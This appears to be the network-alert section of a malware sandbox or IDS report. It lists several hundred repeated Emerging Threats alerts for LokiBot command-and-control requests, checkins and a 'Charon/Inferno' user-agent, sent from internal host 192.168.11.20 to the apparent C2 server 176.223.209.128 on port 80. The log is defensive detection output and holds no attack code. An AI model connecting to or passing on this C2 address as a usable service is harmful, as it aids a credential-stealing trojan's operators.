                                              11/25/21-10:54:13.432566TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15056880192.168.11.20176.223.209.128
                                              11/25/21-10:54:13.432566TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5056880192.168.11.20176.223.209.128
                                              11/25/21-10:54:13.432566TCP2025381ET TROJAN LokiBot Checkin5056880192.168.11.20176.223.209.128
                                              11/25/21-10:54:13.432566TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25056880192.168.11.20176.223.209.128
                                              11/25/21-10:54:13.930896TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15056980192.168.11.20176.223.209.128
                                              11/25/21-10:54:13.930896TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5056980192.168.11.20176.223.209.128
                                              11/25/21-10:54:13.930896TCP2025381ET TROJAN LokiBot Checkin5056980192.168.11.20176.223.209.128
                                              11/25/21-10:54:13.930896TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25056980192.168.11.20176.223.209.128
                                              11/25/21-10:54:14.436252TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15057080192.168.11.20176.223.209.128
                                              11/25/21-10:54:14.436252TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5057080192.168.11.20176.223.209.128
                                              11/25/21-10:54:14.436252TCP2025381ET TROJAN LokiBot Checkin5057080192.168.11.20176.223.209.128
                                              11/25/21-10:54:14.436252TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25057080192.168.11.20176.223.209.128
                                              11/25/21-10:54:14.939600TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15057180192.168.11.20176.223.209.128
                                              11/25/21-10:54:14.939600TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5057180192.168.11.20176.223.209.128
                                              11/25/21-10:54:14.939600TCP2025381ET TROJAN LokiBot Checkin5057180192.168.11.20176.223.209.128
                                              11/25/21-10:54:14.939600TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25057180192.168.11.20176.223.209.128
                                              11/25/21-10:54:15.422756TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15057280192.168.11.20176.223.209.128
                                              11/25/21-10:54:15.422756TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5057280192.168.11.20176.223.209.128
                                              11/25/21-10:54:15.422756TCP2025381ET TROJAN LokiBot Checkin5057280192.168.11.20176.223.209.128
                                              11/25/21-10:54:15.422756TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25057280192.168.11.20176.223.209.128
                                              11/25/21-10:54:15.874761TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15057380192.168.11.20176.223.209.128
                                              11/25/21-10:54:15.874761TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5057380192.168.11.20176.223.209.128
                                              11/25/21-10:54:15.874761TCP2025381ET TROJAN LokiBot Checkin5057380192.168.11.20176.223.209.128
                                              11/25/21-10:54:15.874761TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25057380192.168.11.20176.223.209.128
                                              11/25/21-10:54:16.294505TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15057480192.168.11.20176.223.209.128
                                              11/25/21-10:54:16.294505TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5057480192.168.11.20176.223.209.128
                                              11/25/21-10:54:16.294505TCP2025381ET TROJAN LokiBot Checkin5057480192.168.11.20176.223.209.128
                                              11/25/21-10:54:16.294505TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25057480192.168.11.20176.223.209.128
                                              11/25/21-10:54:16.790297TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15057580192.168.11.20176.223.209.128
                                              11/25/21-10:54:16.790297TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5057580192.168.11.20176.223.209.128
                                              11/25/21-10:54:16.790297TCP2025381ET TROJAN LokiBot Checkin5057580192.168.11.20176.223.209.128
                                              11/25/21-10:54:16.790297TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25057580192.168.11.20176.223.209.128
                                              11/25/21-10:54:17.290043TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15057680192.168.11.20176.223.209.128
                                              11/25/21-10:54:17.290043TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5057680192.168.11.20176.223.209.128
                                              11/25/21-10:54:17.290043TCP2025381ET TROJAN LokiBot Checkin5057680192.168.11.20176.223.209.128
                                              11/25/21-10:54:17.290043TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25057680192.168.11.20176.223.209.128
                                              11/25/21-10:54:17.798373TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15057780192.168.11.20176.223.209.128
                                              11/25/21-10:54:17.798373TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5057780192.168.11.20176.223.209.128
                                              11/25/21-10:54:17.798373TCP2025381ET TROJAN LokiBot Checkin5057780192.168.11.20176.223.209.128
                                              11/25/21-10:54:17.798373TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25057780192.168.11.20176.223.209.128
                                              11/25/21-10:54:18.280836TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15057880192.168.11.20176.223.209.128
                                              11/25/21-10:54:18.280836TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5057880192.168.11.20176.223.209.128
                                              11/25/21-10:54:18.280836TCP2025381ET TROJAN LokiBot Checkin5057880192.168.11.20176.223.209.128
                                              11/25/21-10:54:18.280836TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25057880192.168.11.20176.223.209.128
                                              11/25/21-10:54:18.732676TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15057980192.168.11.20176.223.209.128
                                              11/25/21-10:54:18.732676TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5057980192.168.11.20176.223.209.128
                                              11/25/21-10:54:18.732676TCP2025381ET TROJAN LokiBot Checkin5057980192.168.11.20176.223.209.128
                                              11/25/21-10:54:18.732676TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25057980192.168.11.20176.223.209.128
                                              11/25/21-10:54:19.228582TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15058080192.168.11.20176.223.209.128
                                              11/25/21-10:54:19.228582TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5058080192.168.11.20176.223.209.128
                                              11/25/21-10:54:19.228582TCP2025381ET TROJAN LokiBot Checkin5058080192.168.11.20176.223.209.128
                                              11/25/21-10:54:19.228582TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25058080192.168.11.20176.223.209.128
                                              11/25/21-10:54:19.735000TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15058180192.168.11.20176.223.209.128
                                              11/25/21-10:54:19.735000TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5058180192.168.11.20176.223.209.128
                                              11/25/21-10:54:19.735000TCP2025381ET TROJAN LokiBot Checkin5058180192.168.11.20176.223.209.128
                                              11/25/21-10:54:19.735000TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25058180192.168.11.20176.223.209.128
                                              11/25/21-10:54:20.196224TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15058280192.168.11.20176.223.209.128
                                              11/25/21-10:54:20.196224TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5058280192.168.11.20176.223.209.128
                                              11/25/21-10:54:20.196224TCP2025381ET TROJAN LokiBot Checkin5058280192.168.11.20176.223.209.128
                                              11/25/21-10:54:20.196224TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25058280192.168.11.20176.223.209.128
                                              11/25/21-10:54:20.692031TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15058380192.168.11.20176.223.209.128
                                              11/25/21-10:54:20.692031TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5058380192.168.11.20176.223.209.128
                                              11/25/21-10:54:20.692031TCP2025381ET TROJAN LokiBot Checkin5058380192.168.11.20176.223.209.128
                                              11/25/21-10:54:20.692031TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25058380192.168.11.20176.223.209.128
                                              11/25/21-10:54:21.190323TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15058480192.168.11.20176.223.209.128
                                              11/25/21-10:54:21.190323TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5058480192.168.11.20176.223.209.128
                                              11/25/21-10:54:21.190323TCP2025381ET TROJAN LokiBot Checkin5058480192.168.11.20176.223.209.128
                                              11/25/21-10:54:21.190323TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25058480192.168.11.20176.223.209.128
                                              11/25/21-10:54:21.687268TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15058580192.168.11.20176.223.209.128
                                              11/25/21-10:54:21.687268TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5058580192.168.11.20176.223.209.128
                                              11/25/21-10:54:21.687268TCP2025381ET TROJAN LokiBot Checkin5058580192.168.11.20176.223.209.128
                                              11/25/21-10:54:21.687268TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25058580192.168.11.20176.223.209.128
                                              11/25/21-10:54:22.210906TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15058680192.168.11.20176.223.209.128
                                              11/25/21-10:54:22.210906TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5058680192.168.11.20176.223.209.128
                                              11/25/21-10:54:22.210906TCP2025381ET TROJAN LokiBot Checkin5058680192.168.11.20176.223.209.128
                                              11/25/21-10:54:22.210906TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25058680192.168.11.20176.223.209.128
                                              11/25/21-10:54:22.705041TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15058780192.168.11.20176.223.209.128
                                              11/25/21-10:54:22.705041TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5058780192.168.11.20176.223.209.128
                                              11/25/21-10:54:22.705041TCP2025381ET TROJAN LokiBot Checkin5058780192.168.11.20176.223.209.128
                                              11/25/21-10:54:22.705041TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25058780192.168.11.20176.223.209.128
                                              11/25/21-10:54:23.229445TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15058880192.168.11.20176.223.209.128
                                              11/25/21-10:54:23.229445TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5058880192.168.11.20176.223.209.128
                                              11/25/21-10:54:23.229445TCP2025381ET TROJAN LokiBot Checkin5058880192.168.11.20176.223.209.128
                                              11/25/21-10:54:23.229445TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25058880192.168.11.20176.223.209.128
                                              11/25/21-10:54:23.722718TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15058980192.168.11.20176.223.209.128
                                              11/25/21-10:54:23.722718TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5058980192.168.11.20176.223.209.128
                                              11/25/21-10:54:23.722718TCP2025381ET TROJAN LokiBot Checkin5058980192.168.11.20176.223.209.128
                                              11/25/21-10:54:23.722718TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25058980192.168.11.20176.223.209.128
                                              11/25/21-10:54:24.176005TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15059080192.168.11.20176.223.209.128
                                              11/25/21-10:54:24.176005TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5059080192.168.11.20176.223.209.128
                                              11/25/21-10:54:24.176005TCP2025381ET TROJAN LokiBot Checkin5059080192.168.11.20176.223.209.128
                                              11/25/21-10:54:24.176005TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25059080192.168.11.20176.223.209.128
                                              11/25/21-10:54:24.687769TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15059180192.168.11.20176.223.209.128
                                              11/25/21-10:54:24.687769TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5059180192.168.11.20176.223.209.128
                                              11/25/21-10:54:24.687769TCP2025381ET TROJAN LokiBot Checkin5059180192.168.11.20176.223.209.128
                                              11/25/21-10:54:24.687769TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25059180192.168.11.20176.223.209.128
                                              11/25/21-10:54:25.208926TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15059280192.168.11.20176.223.209.128
                                              11/25/21-10:54:25.208926TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5059280192.168.11.20176.223.209.128
                                              11/25/21-10:54:25.208926TCP2025381ET TROJAN LokiBot Checkin5059280192.168.11.20176.223.209.128
                                              11/25/21-10:54:25.208926TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25059280192.168.11.20176.223.209.128
                                              11/25/21-10:54:25.717249TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15059380192.168.11.20176.223.209.128
                                              11/25/21-10:54:25.717249TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5059380192.168.11.20176.223.209.128
                                              11/25/21-10:54:25.717249TCP2025381ET TROJAN LokiBot Checkin5059380192.168.11.20176.223.209.128
                                              11/25/21-10:54:25.717249TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25059380192.168.11.20176.223.209.128
                                              11/25/21-10:54:26.227737TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15059480192.168.11.20176.223.209.128
                                              11/25/21-10:54:26.227737TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5059480192.168.11.20176.223.209.128
                                              11/25/21-10:54:26.227737TCP2025381ET TROJAN LokiBot Checkin5059480192.168.11.20176.223.209.128
                                              11/25/21-10:54:26.227737TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25059480192.168.11.20176.223.209.128
                                              11/25/21-10:54:26.656063TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15059580192.168.11.20176.223.209.128
                                              11/25/21-10:54:26.656063TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5059580192.168.11.20176.223.209.128
                                              11/25/21-10:54:26.656063TCP2025381ET TROJAN LokiBot Checkin5059580192.168.11.20176.223.209.128
                                              11/25/21-10:54:26.656063TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25059580192.168.11.20176.223.209.128
                                              11/25/21-10:54:27.183294TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15059680192.168.11.20176.223.209.128
                                              11/25/21-10:54:27.183294TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5059680192.168.11.20176.223.209.128
                                              11/25/21-10:54:27.183294TCP2025381ET TROJAN LokiBot Checkin5059680192.168.11.20176.223.209.128
                                              11/25/21-10:54:27.183294TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25059680192.168.11.20176.223.209.128
                                              11/25/21-10:54:27.683854TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15059780192.168.11.20176.223.209.128
                                              11/25/21-10:54:27.683854TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5059780192.168.11.20176.223.209.128
                                              11/25/21-10:54:27.683854TCP2025381ET TROJAN LokiBot Checkin5059780192.168.11.20176.223.209.128
                                              11/25/21-10:54:27.683854TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25059780192.168.11.20176.223.209.128
                                              11/25/21-10:54:28.164932TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15059880192.168.11.20176.223.209.128
                                              11/25/21-10:54:28.164932TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5059880192.168.11.20176.223.209.128
                                              11/25/21-10:54:28.164932TCP2025381ET TROJAN LokiBot Checkin5059880192.168.11.20176.223.209.128
                                              11/25/21-10:54:28.164932TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25059880192.168.11.20176.223.209.128
                                              11/25/21-10:54:28.673309TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15059980192.168.11.20176.223.209.128
                                              11/25/21-10:54:28.673309TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5059980192.168.11.20176.223.209.128
                                              11/25/21-10:54:28.673309TCP2025381ET TROJAN LokiBot Checkin5059980192.168.11.20176.223.209.128
                                              11/25/21-10:54:28.673309TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25059980192.168.11.20176.223.209.128
                                              11/25/21-10:54:29.175600TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15060080192.168.11.20176.223.209.128
                                              11/25/21-10:54:29.175600TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5060080192.168.11.20176.223.209.128
                                              11/25/21-10:54:29.175600TCP2025381ET TROJAN LokiBot Checkin5060080192.168.11.20176.223.209.128
                                              11/25/21-10:54:29.175600TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25060080192.168.11.20176.223.209.128
                                              11/25/21-10:54:29.632936TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15060180192.168.11.20176.223.209.128
                                              11/25/21-10:54:29.632936TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5060180192.168.11.20176.223.209.128
                                              11/25/21-10:54:29.632936TCP2025381ET TROJAN LokiBot Checkin5060180192.168.11.20176.223.209.128
                                              11/25/21-10:54:29.632936TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25060180192.168.11.20176.223.209.128
                                              11/25/21-10:54:30.061319TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15060280192.168.11.20176.223.209.128
                                              11/25/21-10:54:30.061319TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5060280192.168.11.20176.223.209.128
                                              11/25/21-10:54:30.061319TCP2025381ET TROJAN LokiBot Checkin5060280192.168.11.20176.223.209.128
                                              11/25/21-10:54:30.061319TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25060280192.168.11.20176.223.209.128
                                              11/25/21-10:54:30.580873TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15060380192.168.11.20176.223.209.128
                                              11/25/21-10:54:30.580873TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5060380192.168.11.20176.223.209.128
                                              11/25/21-10:54:30.580873TCP2025381ET TROJAN LokiBot Checkin5060380192.168.11.20176.223.209.128
                                              11/25/21-10:54:30.580873TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25060380192.168.11.20176.223.209.128
                                              11/25/21-10:54:31.098892TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15060480192.168.11.20176.223.209.128
                                              11/25/21-10:54:31.098892TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5060480192.168.11.20176.223.209.128
                                              11/25/21-10:54:31.098892TCP2025381ET TROJAN LokiBot Checkin5060480192.168.11.20176.223.209.128
                                              11/25/21-10:54:31.098892TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25060480192.168.11.20176.223.209.128
                                              11/25/21-10:54:31.612838TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15060580192.168.11.20176.223.209.128
                                              11/25/21-10:54:31.612838TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5060580192.168.11.20176.223.209.128
                                              11/25/21-10:54:31.612838TCP2025381ET TROJAN LokiBot Checkin5060580192.168.11.20176.223.209.128
                                              11/25/21-10:54:31.612838TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25060580192.168.11.20176.223.209.128
                                              11/25/21-10:54:32.118997TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15060680192.168.11.20176.223.209.128
                                              11/25/21-10:54:32.118997TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5060680192.168.11.20176.223.209.128
                                              11/25/21-10:54:32.118997TCP2025381ET TROJAN LokiBot Checkin5060680192.168.11.20176.223.209.128
                                              11/25/21-10:54:32.118997TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25060680192.168.11.20176.223.209.128
                                              11/25/21-10:54:32.556276TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15060780192.168.11.20176.223.209.128
                                              11/25/21-10:54:32.556276TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5060780192.168.11.20176.223.209.128
                                              11/25/21-10:54:32.556276TCP2025381ET TROJAN LokiBot Checkin5060780192.168.11.20176.223.209.128
                                              11/25/21-10:54:32.556276TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25060780192.168.11.20176.223.209.128
                                              11/25/21-10:54:33.057683TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15060880192.168.11.20176.223.209.128
                                              11/25/21-10:54:33.057683TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5060880192.168.11.20176.223.209.128
                                              11/25/21-10:54:33.057683TCP2025381ET TROJAN LokiBot Checkin5060880192.168.11.20176.223.209.128
                                              11/25/21-10:54:33.057683TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25060880192.168.11.20176.223.209.128
                                              11/25/21-10:54:33.558687TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15060980192.168.11.20176.223.209.128
                                              11/25/21-10:54:33.558687TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5060980192.168.11.20176.223.209.128
                                              11/25/21-10:54:33.558687TCP2025381ET TROJAN LokiBot Checkin5060980192.168.11.20176.223.209.128
                                              11/25/21-10:54:33.558687TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25060980192.168.11.20176.223.209.128
                                              11/25/21-10:54:34.080656TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15061080192.168.11.20176.223.209.128
                                              11/25/21-10:54:34.080656TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5061080192.168.11.20176.223.209.128
                                              11/25/21-10:54:34.080656TCP2025381ET TROJAN LokiBot Checkin5061080192.168.11.20176.223.209.128
                                              11/25/21-10:54:34.080656TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25061080192.168.11.20176.223.209.128
                                              11/25/21-10:54:34.588985TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15061180192.168.11.20176.223.209.128
                                              11/25/21-10:54:34.588985TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5061180192.168.11.20176.223.209.128
                                              11/25/21-10:54:34.588985TCP2025381ET TROJAN LokiBot Checkin5061180192.168.11.20176.223.209.128
                                              11/25/21-10:54:34.588985TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25061180192.168.11.20176.223.209.128
                                              11/25/21-10:54:35.090544TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15061280192.168.11.20176.223.209.128
                                              11/25/21-10:54:35.090544TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5061280192.168.11.20176.223.209.128
                                              11/25/21-10:54:35.090544TCP2025381ET TROJAN LokiBot Checkin5061280192.168.11.20176.223.209.128
                                              11/25/21-10:54:35.090544TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25061280192.168.11.20176.223.209.128
                                              11/25/21-10:54:35.567270TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15061380192.168.11.20176.223.209.128
                                              11/25/21-10:54:35.567270TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5061380192.168.11.20176.223.209.128
                                              11/25/21-10:54:35.567270TCP2025381ET TROJAN LokiBot Checkin5061380192.168.11.20176.223.209.128
                                              11/25/21-10:54:35.567270TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25061380192.168.11.20176.223.209.128
                                              11/25/21-10:54:36.074487TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15061480192.168.11.20176.223.209.128
                                              11/25/21-10:54:36.074487TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5061480192.168.11.20176.223.209.128
                                              11/25/21-10:54:36.074487TCP2025381ET TROJAN LokiBot Checkin5061480192.168.11.20176.223.209.128
                                              11/25/21-10:54:36.074487TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25061480192.168.11.20176.223.209.128
                                              11/25/21-10:54:36.588960TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15061580192.168.11.20176.223.209.128
                                              11/25/21-10:54:36.588960TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5061580192.168.11.20176.223.209.128
                                              11/25/21-10:54:36.588960TCP2025381ET TROJAN LokiBot Checkin5061580192.168.11.20176.223.209.128
                                              11/25/21-10:54:36.588960TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25061580192.168.11.20176.223.209.128
                                              11/25/21-10:54:37.058855TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15061680192.168.11.20176.223.209.128
                                              11/25/21-10:54:37.058855TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5061680192.168.11.20176.223.209.128
                                              11/25/21-10:54:37.058855TCP2025381ET TROJAN LokiBot Checkin5061680192.168.11.20176.223.209.128
                                              11/25/21-10:54:37.058855TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25061680192.168.11.20176.223.209.128
                                              11/25/21-10:54:37.563383TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15061780192.168.11.20176.223.209.128
                                              11/25/21-10:54:37.563383TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5061780192.168.11.20176.223.209.128
                                              11/25/21-10:54:37.563383TCP2025381ET TROJAN LokiBot Checkin5061780192.168.11.20176.223.209.128
                                              11/25/21-10:54:37.563383TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25061780192.168.11.20176.223.209.128
                                              11/25/21-10:54:38.018762TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15061880192.168.11.20176.223.209.128
                                              11/25/21-10:54:38.018762TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5061880192.168.11.20176.223.209.128
                                              11/25/21-10:54:38.018762TCP2025381ET TROJAN LokiBot Checkin5061880192.168.11.20176.223.209.128
                                              11/25/21-10:54:38.018762TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25061880192.168.11.20176.223.209.128
                                              11/25/21-10:54:38.499060TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15061980192.168.11.20176.223.209.128
                                              11/25/21-10:54:38.499060TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5061980192.168.11.20176.223.209.128
                                              11/25/21-10:54:38.499060TCP2025381ET TROJAN LokiBot Checkin5061980192.168.11.20176.223.209.128
                                              11/25/21-10:54:38.499060TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25061980192.168.11.20176.223.209.128
                                              11/25/21-10:54:39.022864TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15062080192.168.11.20176.223.209.128
                                              11/25/21-10:54:39.022864TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5062080192.168.11.20176.223.209.128
                                              11/25/21-10:54:39.022864TCP2025381ET TROJAN LokiBot Checkin5062080192.168.11.20176.223.209.128
                                              11/25/21-10:54:39.022864TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25062080192.168.11.20176.223.209.128
                                              11/25/21-10:54:39.521845TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15062180192.168.11.20176.223.209.128
                                              11/25/21-10:54:39.521845TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5062180192.168.11.20176.223.209.128
                                              11/25/21-10:54:39.521845TCP2025381ET TROJAN LokiBot Checkin5062180192.168.11.20176.223.209.128
                                              11/25/21-10:54:39.521845TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25062180192.168.11.20176.223.209.128
                                              11/25/21-10:54:40.029450TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15062280192.168.11.20176.223.209.128
                                              11/25/21-10:54:40.029450TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5062280192.168.11.20176.223.209.128
                                              11/25/21-10:54:40.029450TCP2025381ET TROJAN LokiBot Checkin5062280192.168.11.20176.223.209.128
                                              11/25/21-10:54:40.029450TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25062280192.168.11.20176.223.209.128
                                              11/25/21-10:54:40.556828TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15062380192.168.11.20176.223.209.128
                                              11/25/21-10:54:40.556828TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5062380192.168.11.20176.223.209.128
                                              11/25/21-10:54:40.556828TCP2025381ET TROJAN LokiBot Checkin5062380192.168.11.20176.223.209.128
                                              11/25/21-10:54:40.556828TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25062380192.168.11.20176.223.209.128
                                              11/25/21-10:54:41.063492TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15062480192.168.11.20176.223.209.128
                                              11/25/21-10:54:41.063492TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5062480192.168.11.20176.223.209.128
                                              11/25/21-10:54:41.063492TCP2025381ET TROJAN LokiBot Checkin5062480192.168.11.20176.223.209.128
                                              11/25/21-10:54:41.063492TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25062480192.168.11.20176.223.209.128
                                              11/25/21-10:54:41.563964TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15062580192.168.11.20176.223.209.128
                                              11/25/21-10:54:41.563964TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5062580192.168.11.20176.223.209.128
                                              11/25/21-10:54:41.563964TCP2025381ET TROJAN LokiBot Checkin5062580192.168.11.20176.223.209.128
                                              11/25/21-10:54:41.563964TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25062580192.168.11.20176.223.209.128
                                              11/25/21-10:54:42.044572TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15062680192.168.11.20176.223.209.128
